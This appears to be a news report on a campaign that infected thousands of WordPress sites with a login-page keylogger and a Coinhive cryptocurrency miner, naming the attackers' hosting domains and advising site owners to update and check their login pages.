Security researchers have discovered over 2,000 WordPress sites —possibly more— infected with a keylogger that's being loaded on the WordPress backend login page and a cryptojacking script (in-browser cryptocurrency miner) on their frontends.
Researchers have tied these newly discovered infected sites to a similar operation that took place in early December 2017.
The attack is quite simple. Miscreants find unsecured WordPress sites —usually running older WordPress versions or older themes and plugins— and use exploits for those sites to inject malicious code into the CMS' source code.
The malicious code includes two parts. For the admin login page, the code loads a keylogger hosted on a third-party domain. For the site's frontend, crooks load the Coinhive in-browser miner and mine Monero using the CPUs of people visiting the site.
For the late-2017 campaign, crooks loaded their keylogger from the "cloudflare.solutions" domain. Those attacks affected nearly 5,500 WordPress sites but were stopped on December 8 when the registrar took down the miscreants' domain.
According to a new report released yesterday by Sucuri, the company who's been tracking this campaign since April 2017, crooks are now loading the keylogger from three new domains: cdjs.online, cdns.ws, and msdns.online.
Sucuri fears that not all affected sites are being indexed in PublicWWW and that the number of victims could be even bigger.
WordPress website owners are advised to review their sites, update anything that needs updating, and review if suspicious scripts are being loaded on their login page.
It was only in December when this group moved to the more devious practice of collecting admin credentials via a keylogger.